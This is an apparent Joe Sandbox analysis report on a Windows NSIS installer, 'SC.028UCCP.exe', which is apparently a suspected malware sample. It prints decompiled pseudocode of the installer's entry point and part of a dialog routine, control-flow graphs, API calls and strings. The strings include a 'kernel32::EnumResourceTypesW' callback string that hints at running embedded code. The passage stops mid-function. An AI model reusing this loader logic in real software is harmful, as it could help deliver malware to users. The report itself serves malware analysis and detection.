4684->4676 4684->4677 4684->4682 4686 405bba 18 API calls 4684->4686 4695 4053c9 MessageBoxIndirectA 4684->4695 4698 40183b 4684->4698 4699 405846 GetFileAttributesA CreateFileA 4684->4699 4685->4687 4686->4684 4688 4018b8 4687->4688 4687->4689 4690 4018d0 4688->4690 4691 4018bd 4688->4691 4692 405bba 18 API calls 4690->4692 4693 405bba 18 API calls 4691->4693 4694 4018d8 4692->4694 4696 4018c5 lstrcatA 4693->4696 4697 4053c9 MessageBoxIndirectA 4694->4697 4695->4684 4696->4694 4697->4689 4698->4679 4698->4689 4699->4684 4700->4668 4701->4669 5299 40163f 5300 402a07 18 API calls 5299->5300 5301 401645 5300->5301 5302 405e9c 2 API calls 5301->5302 5303 40164b 5302->5303 5304 40193f 5305 4029ea 18 API calls 5304->5305 5306 401946 5305->5306 5307 4029ea 18 API calls 5306->5307 5308 401950 5307->5308 5309 402a07 18 API calls 5308->5309 5310 401959 5309->5310 5311 40196c lstrlenA 5310->5311 5313 4019a7 5310->5313 5312 401976 5311->5312 5312->5313 5317 405b98 lstrcpynA 5312->5317 5315 401990 5315->5313 5316 40199d lstrlenA 5315->5316 5316->5313 5317->5315

                                  Executed Functions

                                  Function 0040310B Relevance: 80.8, APIs: 27, Strings: 19, Instructions: 324stringfilecomCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 40310b-4031a2 #17 SetErrorMode OleInitialize call 405ec3 SHGetFileInfoA call 405b98 GetCommandLineA call 405b98 GetModuleHandleA 7 4031a4-4031a9 0->7 8 4031ae-4031c3 call 405670 CharNextA 0->8 7->8 11 403288-40328c 8->11 12 403292 11->12 13 4031c8-4031cb 11->13 16 4032a5-4032bf GetTempPathA call 4030d7 12->16 14 4031d3-4031db 13->14 15 4031cd-4031d1 13->15 17 4031e3-4031e6 14->17 18 4031dd-4031de 14->18 15->14 15->15 25 4032c1-4032df GetWindowsDirectoryA lstrcatA call 4030d7 16->25 26 403317-403331 DeleteFileA call 402c33 16->26 20 403278-403285 call 405670 17->20 21 4031ec-4031f0 17->21 18->17 20->11 36 403287 20->36 23 4031f2-4031f8 21->23 24 403208-403235 21->24 28 4031fa-4031fc 23->28 29 4031fe 23->29 30 403237-40323d 24->30 31 403248-403276 24->31 25->26 44 4032e1-403311 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4030d7 25->44 41 4033c5-4033d4 call 403569 OleUninitialize 26->41 42 403337-40333d 26->42 28->24 28->29 29->24 37 403243 30->37 38 40323f-403241 30->38 31->20 40 403294-4032a0 call 405b98 31->40 36->11 37->31 38->31 38->37 40->16 55 4033da-4033ea call 4053c9 ExitProcess 41->55 56 4034ce-4034d4 41->56 45 4033b5-4033bc call 403643 42->45 46 40333f-40334a call 405670 42->46 44->26 44->41 53 4033c1 45->53 59 403380-40338a 46->59 60 40334c-403375 46->60 53->41 57 403551-403559 56->57 58 4034d6-4034f3 call 405ec3 * 3 56->58 63 40355b 57->63 64 40355f-403563 ExitProcess 57->64 88 4034f5-4034f7 58->88 89 40353d-403548 ExitWindowsEx 58->89 66 4033f0-40340a lstrcatA lstrcmpiA 59->66 67 40338c-403399 call 405733 59->67 65 403377-403379 60->65 63->64 65->59 70 40337b-40337e 65->70 66->41 72 40340c-403421 CreateDirectoryA SetCurrentDirectoryA 66->72 67->41 78 40339b-4033b1 call 405b98 * 2 67->78 70->59 70->65 75 403423-403429 call 405b98 72->75 76 40342e-403456 call 405b98 72->76 75->76 84 40345c-403478 call 405bba DeleteFileA 76->84 78->45 95 4034b9-4034c0 84->95 96 40347a-40348a CopyFileA 84->96 88->89 94 4034f9-4034fb 88->94 89->57 93 40354a-40354c call 40140b 89->93 93->57 94->89 98 4034fd-40350f GetCurrentProcess 94->98 95->84 100 4034c2-4034c9 call 405a4c 95->100 96->95 99 40348c-4034ac call 405a4c call 405bba call 405368 96->99 98->89 106 403511-403533 98->106 99->95 112 4034ae-4034b5 CloseHandle 99->112 100->41 106->89 112->95
                                  C-Code - Quality: 87%
                                  			_entry_() {
				int _t38;
				CHAR* _t43;
				char* _t46;
				CHAR* _t48;
				void* _t52;
				intOrPtr _t54;
				int _t56;
				int _t59;
				int _t60;
				int _t64;
				intOrPtr _t78;
				intOrPtr _t84;
				void* _t86;
				signed int _t100;
				void* _t103;
				void* _t108;
				char _t110;
				int _t129;
				int _t130;
				CHAR* _t137;
				int _t138;
				int _t140;
				intOrPtr* _t143;
				char* _t146;
				int _t147;
				void* _t148;
				void* _t149;
				intOrPtr _t156;
				char _t166;

				 *(_t149 + 0x18) = 0;
				 *((intOrPtr*)(_t149 + 0x10)) = "Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t149 + 0x20) = 0;
				 *((char*)(_t149 + 0x14)) = 0x20;
				__imp__#17();
				_t38 = SetErrorMode(0x8001); // executed
				__imp__OleInitialize(0); // executed
				 *0x42ec58 = _t38;
				 *0x42eba4 = E00405EC3(8);
				SHGetFileInfoA(0x428fe0, 0, _t149 + 0x38, 0x160, 0); // executed
				E00405B98("Bilsynssteder Setup", "NSIS Error");
				_t43 = GetCommandLineA();
				_t146 = "\"C:\\Users\\hardz\\Desktop\\SC.028UCCP.exe\"";
				E00405B98(_t146, _t43);
				 *0x42eba0 = GetModuleHandleA(0);
				_t46 = _t146;
				if("\"C:\\Users\\hardz\\Desktop\\SC.028UCCP.exe\"" == 0x22) {
					 *((char*)(_t149 + 0x14)) = 0x22;
					_t46 =  &M00434001;
				}
				_t48 = CharNextA(E00405670(_t46,  *((intOrPtr*)(_t149 + 0x14))));
				 *(_t149 + 0x1c) = _t48;
				while(1) {
					_t110 =  *_t48;
					_t151 = _t110;
					if(_t110 == 0) {
						break;
					}
					__eflags = _t110 - 0x20;
					if(_t110 != 0x20) {
						L5:
						__eflags =  *_t48 - 0x22;
						 *((char*)(_t149 + 0x14)) = 0x20;
						if( *_t48 == 0x22) {
							_t48 =  &(_t48[1]);
							__eflags = _t48;
							 *((char*)(_t149 + 0x14)) = 0x22;
						}
						__eflags =  *_t48 - 0x2f;
						if( *_t48 != 0x2f) {
							L17:
							_t48 = E00405670(_t48,  *((intOrPtr*)(_t149 + 0x14)));
							__eflags =  *_t48 - 0x22;
							if(__eflags == 0) {
								_t48 =  &(_t48[1]);
								__eflags = _t48;
							}
							continue;
						}
						_t48 =  &(_t48[1]);
						__eflags =  *_t48 - 0x53;
						if( *_t48 != 0x53) {
							L12:
							__eflags =  *_t48 - ((( *0x40917b << 0x00000008 |  *0x40917a) << 0x00000008 |  *0x409179) << 0x00000008 | "NCRC");
							if( *_t48 != ((( *0x40917b << 0x00000008 |  *0x40917a) << 0x00000008 |  *0x409179) << 0x00000008 | "NCRC")) {
								L16:
								__eflags =  *((intOrPtr*)(_t48 - 2)) - ((( *0x409173 << 0x00000008 |  *0x409172) << 0x00000008 |  *0x409171) << 0x00000008 | " /D=");
								if( *((intOrPtr*)(_t48 - 2)) == ((( *0x409173 << 0x00000008 |  *0x409172) << 0x00000008 |  *0x409171) << 0x00000008 | " /D=")) {
									 *((char*)(_t48 - 2)) = 0;
									__eflags =  &(_t48[2]);
									E00405B98("C:\\Users\\hardz\\AppData\\Local\\Temp\\Unepitomizeds\\Indlaansrenter",  &(_t48[2]));
									break;
								}
								goto L17;
							}
							_t129 = _t48[4];
							__eflags = _t129 - 0x20;
							if(_t129 == 0x20) {
								L15:
								_t13 = _t149 + 0x20;
								 *_t13 =  *(_t149 + 0x20) | 0x00000004;
								__eflags =  *_t13;
								goto L16;
							}
							__eflags = _t129;
							if(_t129 != 0) {
								goto L16;
							}
							goto L15;
						}
						_t130 = _t48[1];
						__eflags = _t130 - 0x20;
						if(_t130 == 0x20) {
							L11:
							 *0x42ec40 = 1;
							goto L12;
						}
						__eflags = _t130;
						if(_t130 != 0) {
							goto L12;
						}
						goto L11;
					} else {
						goto L4;
					}
					do {
						L4:
						_t48 =  &(_t48[1]);
						__eflags =  *_t48 - 0x20;
					} while ( *_t48 == 0x20);
					goto L5;
				}
				_t137 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
				GetTempPathA(0x400, _t137);
				_t52 = E004030D7(_t151);
				_t152 = _t52;
				if(_t52 != 0) {
					L25:
					DeleteFileA("1033"); // executed
					_t54 = E00402C33(_t154,  *(_t149 + 0x20)); // executed
					 *((intOrPtr*)(_t149 + 0x10)) = _t54;
					if(_t54 != 0) {
						L35:
						E00403569();
						__imp__OleUninitialize();
						if( *((intOrPtr*)(_t149 + 0x10)) == 0) {
							__eflags =  *0x42ec34; // 0x0
							if(__eflags != 0) {
								_t147 = E00405EC3(3);
								_t140 = E00405EC3(4);
								_t59 = E00405EC3(5);
								__eflags = _t147;
								_t138 = _t59;
								if(_t147 != 0) {
									__eflags = _t140;
									if(_t140 != 0) {
										__eflags = _t138;
										if(_t138 != 0) {
											_t64 =  *_t147(GetCurrentProcess(), 0x28, _t149 + 0x1c);
											__eflags = _t64;
											if(_t64 != 0) {
												 *_t140(0, "SeShutdownPrivilege", _t149 + 0x28);
												 *(_t149 + 0x3c) = 1;
												 *(_t149 + 0x48) = 2;
												 *_t138( *((intOrPtr*)(_t149 + 0x30)), 0, _t149 + 0x2c, 0, 0, 0);
											}
										}
									}
								}
								_t60 = ExitWindowsEx(2, 0);
								__eflags = _t60;
								if(_t60 == 0) {
									E0040140B(9);
								}
							}
							_t56 =  *0x42ec4c; // 0x2
							__eflags = _t56 - 0xffffffff;
							if(_t56 != 0xffffffff) {
								 *(_t149 + 0x18) = _t56;
							}
							ExitProcess( *(_t149 + 0x18));
						}
						E004053C9( *((intOrPtr*)(_t149 + 0x14)), 0x200010);
						ExitProcess(2);
					}
					_t156 =  *0x42ebbc; // 0x0
					if(_t156 == 0) {
						L34:
						 *0x42ec4c =  *0x42ec4c | 0xffffffff;
						 *(_t149 + 0x18) = E00403643();
						goto L35;
					}
					_t143 = E00405670(_t146, 0);
					if(_t143 < _t146) {
						L31:
						_t161 = _t143 - _t146;
						 *((intOrPtr*)(_t149 + 0x10)) = "Error launching installer";
						if(_t143 < _t146) {
							lstrcatA(_t137, "~nsu.tmp");
							if(lstrcmpiA(_t137, "C:\\Users\\hardz\\Desktop") == 0) {
								goto L35;
							}
							CreateDirectoryA(_t137, 0);
							SetCurrentDirectoryA(_t137);
							_t166 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\Unepitomizeds\\Indlaansrenter"; // 0x43
							if(_t166 == 0) {
								E00405B98("C:\\Users\\hardz\\AppData\\Local\\Temp\\Unepitomizeds\\Indlaansrenter", "C:\\Users\\hardz\\Desktop");
							}
							E00405B98("kernel32::EnumResourceTypesW(i 0,i r1,i 0)",  *(_t149 + 0x1c));
							_t148 = 0x1a;
							do {
								_t78 =  *0x42ebb0; // 0x5aa248
								E00405BBA(0, _t137, 0x428be0, 0x428be0,  *((intOrPtr*)(_t78 + 0x120)));
								DeleteFileA(0x428be0);
								if( *((intOrPtr*)(_t149 + 0x10)) != 0 && CopyFileA("C:\\Users\\hardz\\Desktop\\SC.028UCCP.exe", 0x428be0, 1) != 0) {
									E00405A4C(0x428be0, 0);
									_t84 =  *0x42ebb0; // 0x5aa248
									E00405BBA(0, _t137, 0x428be0, 0x428be0,  *((intOrPtr*)(_t84 + 0x124)));
									_t86 = E00405368(0x428be0);
									if(_t86 != 0) {
										CloseHandle(_t86);
										 *((intOrPtr*)(_t149 + 0x10)) = 0;
									}
								}
								"45088768" =  &("45088768"[1]);
								_t148 = _t148 - 1;
							} while (_t148 != 0);
							E00405A4C(_t137, 0);
							goto L35;
						}
						 *_t143 = 0;
						_t144 = _t143 + 4;
						if(E00405733(_t161, _t143 + 4) == 0) {
							goto L35;
						}
						E00405B98("C:\\Users\\hardz\\AppData\\Local\\Temp\\Unepitomizeds\\Indlaansrenter", _t144);
						E00405B98("C:\\Users\\hardz\\AppData\\Local\\Temp\\Unepitomizeds\\Indlaansrenter\\cavil\\Ablativers91", _t144);
						 *((intOrPtr*)(_t149 + 0x10)) = 0;
						goto L34;
					}
					_t100 = (( *0x409153 << 0x00000008 |  *0x409152) << 0x00000008 |  *0x409151) << 0x00000008 | " _?=";
					while( *_t143 != _t100) {
						_t143 = _t143 - 1;
						if(_t143 >= _t146) {
							continue;
						}
						goto L31;
					}
					goto L31;
				}
				GetWindowsDirectoryA(_t137, 0x3fb);
				lstrcatA(_t137, "\\Temp");
				_t103 = E004030D7(_t152);
				_t153 = _t103;
				if(_t103 != 0) {
					goto L25;
				}
				GetTempPathA(0x3fc, _t137);
				lstrcatA(_t137, "Low");
				SetEnvironmentVariableA("TEMP", _t137);
				SetEnvironmentVariableA("TMP", _t137);
				_t108 = E004030D7(_t153);
				_t154 = _t108;
				if(_t108 == 0) {
					goto L35;
				}
				goto L25;
			}
































                                  0x00403117
                                  0x0040311b
                                  0x00403123
                                  0x00403127
                                  0x0040312c
                                  0x00403137
                                  0x0040313e
                                  0x00403146
                                  0x00403150
                                  0x00403166
                                  0x00403176
                                  0x0040317b
                                  0x00403181
                                  0x00403188
                                  0x0040319b
                                  0x004031a0
                                  0x004031a2
                                  0x004031a4
                                  0x004031a9
                                  0x004031a9
                                  0x004031b9
                                  0x004031bf
                                  0x00403288
                                  0x00403288
                                  0x0040328a
                                  0x0040328c
                                  0x00403292
                                  0x00403292
                                  0x004031c8
                                  0x004031cb
                                  0x004031d3
                                  0x004031d3
                                  0x004031d6
                                  0x004031db
                                  0x004031dd
                                  0x004031dd
                                  0x004031de
                                  0x004031de
                                  0x004031e3
                                  0x004031e6
                                  0x00403278
                                  0x0040327d
                                  0x00403282
                                  0x00403285
                                  0x00403287
                                  0x00403287
                                  0x00403287
                                  0x00000000
                                  0x00403285
                                  0x004031ec
                                  0x004031ed
                                  0x004031f0
                                  0x00403208
                                  0x00403233
                                  0x00403235
                                  0x00403248
                                  0x00403273
                                  0x00403276
                                  0x00403294
                                  0x00403297
                                  0x004032a0
                                  0x00000000
                                  0x004032a0
                                  0x00000000
                                  0x00403276
                                  0x00403237
                                  0x0040323a
                                  0x0040323d
                                  0x00403243
                                  0x00403243
                                  0x00403243
                                  0x00403243
                                  0x00000000
                                  0x00403243
                                  0x0040323f
                                  0x00403241
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00403241
                                  0x004031f2
                                  0x004031f5
                                  0x004031f8
                                  0x004031fe
                                  0x004031fe
                                  0x00000000
                                  0x004031fe
                                  0x004031fa
                                  0x004031fc
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004031cd
                                  0x004031cd
                                  0x004031cd
                                  0x004031ce
                                  0x004031ce
                                  0x00000000
                                  0x004031cd
                                  0x004032ab
                                  0x004032b6
                                  0x004032b8
                                  0x004032bd
                                  0x004032bf
                                  0x00403317
                                  0x0040331c
                                  0x00403326
                                  0x0040332d
                                  0x00403331
                                  0x004033c5
                                  0x004033c5
                                  0x004033ca
                                  0x004033d4
                                  0x004034ce
                                  0x004034d4
                                  0x004034df
                                  0x004034e8
                                  0x004034ea
                                  0x004034ef
                                  0x004034f1
                                  0x004034f3
                                  0x004034f5
                                  0x004034f7
                                  0x004034f9
                                  0x004034fb
                                  0x0040350b
                                  0x0040350d
                                  0x0040350f
                                  0x0040351c
                                  0x0040352b
                                  0x00403533
                                  0x0040353b
                                  0x0040353b
                                  0x0040350f
                                  0x004034fb
                                  0x004034f7
                                  0x00403540
                                  0x00403546
                                  0x00403548
                                  0x0040354c
                                  0x0040354c
                                  0x00403548
                                  0x00403551
                                  0x00403556
                                  0x00403559
                                  0x0040355b
                                  0x0040355b
                                  0x00403563
                                  0x00403563
                                  0x004033e3
                                  0x004033ea
                                  0x004033ea
                                  0x00403337
                                  0x0040333d
                                  0x004033b5
                                  0x004033b5
                                  0x004033c1
                                  0x00000000
                                  0x004033c1
                                  0x00403346
                                  0x0040334a
                                  0x00403380
                                  0x00403380
                                  0x00403382
                                  0x0040338a
                                  0x004033f6
                                  0x0040340a
                                  0x00000000
                                  0x00000000
                                  0x0040340e
                                  0x00403415
                                  0x0040341b
                                  0x00403421
                                  0x00403429
                                  0x00403429
                                  0x00403437
                                  0x0040344e
                                  0x0040345c
                                  0x0040345c
                                  0x00403468
                                  0x0040346e
                                  0x00403478
                                  0x0040348e
                                  0x00403493
                                  0x0040349f
                                  0x004034a5
                                  0x004034ac
                                  0x004034af
                                  0x004034b5
                                  0x004034b5
                                  0x004034ac
                                  0x004034b9
                                  0x004034bf
                                  0x004034bf
                                  0x004034c4
                                  0x00000000
                                  0x004034c4
                                  0x0040338c
                                  0x0040338e
                                  0x00403399
                                  0x00000000
                                  0x00000000
                                  0x004033a1
                                  0x004033ac
                                  0x004033b1
                                  0x00000000
                                  0x004033b1
                                  0x00403375
                                  0x00403377
                                  0x0040337b
                                  0x0040337e
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040337e
                                  0x00000000
                                  0x00403377
                                  0x004032c7
                                  0x004032d3
                                  0x004032d8
                                  0x004032dd
                                  0x004032df
                                  0x00000000
                                  0x00000000
                                  0x004032e7
                                  0x004032ef
                                  0x00403300
                                  0x00403308
                                  0x0040330a
                                  0x0040330f
                                  0x00403311
                                  0x00000000
                                  0x00000000
                                  0x00000000

                                  APIs
                                  • #17.COMCTL32 ref: 0040312C
                                  • SetErrorMode.KERNELBASE(00008001), ref: 00403137
                                  • OleInitialize.OLE32(00000000), ref: 0040313E
                                    • Part of subcall function 00405EC3: GetModuleHandleA.KERNEL32(?,?,?,00403150,00000008), ref: 00405ED5
                                    • Part of subcall function 00405EC3: LoadLibraryA.KERNELBASE(?,?,?,00403150,00000008), ref: 00405EE0
                                    • Part of subcall function 00405EC3: GetProcAddress.KERNEL32(00000000,?), ref: 00405EF1
                                  • SHGetFileInfoA.SHELL32(00428FE0,00000000,?,00000160,00000000,00000008), ref: 00403166
                                    • Part of subcall function 00405B98: lstrcpynA.KERNEL32(?,?,00000400,0040317B,Bilsynssteder Setup,NSIS Error), ref: 00405BA5
                                  • GetCommandLineA.KERNEL32(Bilsynssteder Setup,NSIS Error), ref: 0040317B
                                  • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\SC.028UCCP.exe",00000000), ref: 0040318E
                                  • CharNextA.USER32(00000000,"C:\Users\user\Desktop\SC.028UCCP.exe",00000020), ref: 004031B9
                                  • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004032B6
                                  • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004032C7
                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004032D3
                                  • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004032E7
                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004032EF
                                  • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403300
                                  • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403308
                                  • DeleteFileA.KERNELBASE(1033), ref: 0040331C
                                  • OleUninitialize.OLE32(?), ref: 004033CA
                                  • ExitProcess.KERNEL32 ref: 004033EA
                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\SC.028UCCP.exe",00000000,?), ref: 004033F6
                                  • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\SC.028UCCP.exe",00000000,?), ref: 00403402
                                  • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040340E
                                  • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403415
                                  • DeleteFileA.KERNEL32(00428BE0,00428BE0,?,kernel32::EnumResourceTypesW(i 0,i r1,i 0),?), ref: 0040346E
                                  • CopyFileA.KERNEL32(C:\Users\user\Desktop\SC.028UCCP.exe,00428BE0,00000001), ref: 00403482
                                  • CloseHandle.KERNEL32(00000000,00428BE0,00428BE0,?,00428BE0,00000000), ref: 004034AF
                                  • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 00403504
                                  • ExitWindowsEx.USER32 ref: 00403540
                                  • ExitProcess.KERNEL32 ref: 00403563
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                  • String ID: "$"C:\Users\user\Desktop\SC.028UCCP.exe"$1033$45088768$Bilsynssteder Setup$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter$C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter\cavil\Ablativers91$C:\Users\user\Desktop$C:\Users\user\Desktop\SC.028UCCP.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$kernel32::EnumResourceTypesW(i 0,i r1,i 0)$~nsu.tmp
                                  • API String ID: 4107622049-4129128723
                                  • Opcode ID: 393541757f93537c9b418c913b57d133516a80a4bf131b4d3cef9bc631cffbd2
                                  • Instruction ID: f0167c368e647f3a77010dc3120ed20833c92e3e1e0627bdd261849a200f56ec
                                  • Opcode Fuzzy Hash: 393541757f93537c9b418c913b57d133516a80a4bf131b4d3cef9bc631cffbd2
                                  • Instruction Fuzzy Hash: ACB116306083816AE7216F719C8DA2B7EA8AB45706F44057FF581762E3C77C9A05CB6E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404822 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMONCrypto
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 113 404822-40486e GetDlgItem * 2 114 404874-404908 GlobalAlloc LoadBitmapA SetWindowLongA ImageList_Create ImageList_AddMasked SendMessageA * 2 113->114 115 404a8e-404a95 113->115 116 404917-40491e DeleteObject 114->116 117 40490a-404915 SendMessageA 114->117 118 404a97-404aa7 115->118 119 404aa9 115->119 121 404920-404928 116->121 117->116 120 404aac-404ab5 118->120 119->120 122 404ac0-404ac6 120->122 123 404ab7-404aba 120->123 124 404951-404955 121->124 125 40492a-40492d 121->125 129 404ad5-404adc 122->129 130 404ac8-404acf 122->130 123->122 126 404ba4-404bab 123->126 124->121 131 404957-404983 call 403ea8 * 2 124->131 127 404932-40494f call 405bba SendMessageA * 2 125->127 128 40492f 125->128 133 404c1c-404c24 126->133 134 404bad-404bb3 126->134 127->124 128->127 136 404b51-404b54 129->136 137 404ade-404ae1 129->137 130->126 130->129 169 404989-40498f 131->169 170 404a4d-404a60 GetWindowLongA SetWindowLongA 131->170 142 404c26-404c2c SendMessageA 133->142 143 404c2e-404c35 133->143 139 404e04-404e16 call 403f0f 134->139 140 404bb9-404bc3 134->140 136->126 141 404b56-404b60 136->141 145 404ae3-404aea 137->145 146 404aec-404b01 call 404770 137->146 140->139 149 404bc9-404bd8 SendMessageA 140->149 151 404b70-404b7a 141->151 152 404b62-404b6e SendMessageA 141->152 142->143 153 404c37-404c3e 143->153 154 404c69-404c70 143->154 145->136 145->146 146->136 168 404b03-404b14 146->168 149->139 161 404bde-404bef SendMessageA 149->161 151->126 163 404b7c-404b86 151->163 152->151 155 404c40-404c41 ImageList_Destroy 153->155 156 404c47-404c4e 153->156 159 404dc6-404dcd 154->159 160 404c76-404c82 call 4011ef 154->160 155->156 166 404c50-404c51 GlobalFree 156->166 167 404c57-404c63 156->167 159->139 174 404dcf-404dd6 159->174 185 404c92-404c95 160->185 186 404c84-404c87 160->186 172 404bf1-404bf7 161->172 173 404bf9-404bfb 161->173 164 404b97-404ba1 163->164 165 404b88-404b95 163->165 164->126 165->126 166->167 167->154 168->136 175 404b16-404b18 168->175 176 404992-404998 169->176 180 404a66-404a6a 170->180 172->173 178 404bfc-404c15 call 401299 SendMessageA 172->178 173->178 174->139 179 404dd8-404e02 ShowWindow GetDlgItem ShowWindow 174->179 181 404b1a-404b21 175->181 182 404b2b 175->182 183 404a2e-404a41 176->183 184 40499e-4049c6 176->184 178->133 179->139 188 404a84-404a8c call 403edd 180->188 189 404a6c-404a7f ShowWindow call 403edd 180->189 192 404b23-404b25 181->192 193 404b27-404b29 181->193 196 404b2e-404b4a call 40117d 182->196 183->176 200 404a47-404a4b 183->200 194 404a00-404a02 184->194 195 4049c8-4049fe SendMessageA 184->195 201 404cd6-404cfa call 4011ef 185->201 202 404c97-404cb0 call 4012e2 call 401299 185->202 197 404c89 186->197 198 404c8a-404c8d call 4047f0 186->198 188->115 189->139 192->196 193->196 203 404a04-404a13 SendMessageA 194->203 204 404a15-404a2b SendMessageA 194->204 195->183 196->136 197->198 198->185 200->170 200->180 215 404d00 201->215 216 404d9c-404db0 InvalidateRect 201->216 221 404cc0-404ccf SendMessageA 202->221 222 404cb2-404cb8 202->222 203->183 204->183 219 404d03-404d0e 215->219 216->159 218 404db2-404dc1 call 404743 call 40468e 216->218 218->159 223 404d10-404d1f 219->223 224 404d84-404d96 219->224 221->201 225 404cba 222->225 226 404cbb-404cbe 222->226 228 404d21-404d2e 223->228 229 404d32-404d35 223->229 224->216 224->219 225->226 226->221 226->222 228->229 231 404d37-404d3a 229->231 232 404d3c-404d45 229->232 234 404d4a-404d82 SendMessageA * 2 231->234 233 404d47 232->233 232->234 233->234 234->224
                                  C-Code - Quality: 97%
                                  			E00404822(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed char* _v28;
				long _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				signed char* _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t179;
				intOrPtr _t180;
				int _t187;
				signed int _t192;
				intOrPtr _t195;
				intOrPtr _t197;
				long _t201;
				signed int _t205;
				signed int _t216;
				void* _t219;
				void* _t220;
				int _t226;
				intOrPtr _t230;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int* _t235;
				signed int _t239;
				signed int _t241;
				signed char _t242;
				signed int _t244;
				signed int _t247;
				signed char _t248;
				signed int _t249;
				void* _t252;
				void* _t254;
				signed char* _t270;
				signed char _t271;
				long _t273;
				long _t276;
				int _t279;
				int _t282;
				signed int _t283;
				long _t284;
				signed int _t287;
				int _t290;
				signed int _t294;
				intOrPtr _t301;
				signed char* _t302;
				struct HWND__* _t306;
				int _t307;
				signed int* _t308;
				int _t309;
				long _t310;
				signed int _t311;
				void* _t313;
				long _t314;
				int _t315;
				signed int _t316;
				void* _t318;
				void* _t326;
				void* _t329;

				_t306 = _a4;
				_v12 = GetDlgItem(_t306, 0x3f9);
				_v8 = GetDlgItem(_t306, 0x408);
				_t179 =  *0x42ebc8; // 0x5aa474
				_t318 = SendMessageA;
				_v20 = _t179;
				_t180 =  *0x42ebb0; // 0x5aa248
				_t282 = 0;
				_v24 = _t180 + 0x94;
				if(_a8 != 0x110) {
					L23:
					__eflags = _a8 - 0x405;
					if(_a8 != 0x405) {
						_t285 = _a16;
					} else {
						_a12 = _t282;
						_t285 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					__eflags = _a8 - 0x4e;
					if(_a8 == 0x4e) {
						L28:
						__eflags = _a8 - 0x413;
						_v16 = _t285;
						if(_a8 == 0x413) {
							L30:
							__eflags =  *0x42ebb9 & 0x00000002;
							if(( *0x42ebb9 & 0x00000002) != 0) {
								L41:
								__eflags = _v16 - _t282;
								if(_v16 != _t282) {
									_t231 = _v16;
									__eflags =  *((intOrPtr*)(_t231 + 8)) - 0xfffffe6e;
									if( *((intOrPtr*)(_t231 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t282,  *(_t231 + 0x5c)); // executed
									}
									_t232 = _v16;
									__eflags =  *((intOrPtr*)(_t232 + 8)) - 0xfffffe6a;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6a) {
										__eflags =  *((intOrPtr*)(_t232 + 0xc)) - 2;
										_t285 = _v20;
										_t233 =  *(_t232 + 0x5c);
										if( *((intOrPtr*)(_t232 + 0xc)) != 2) {
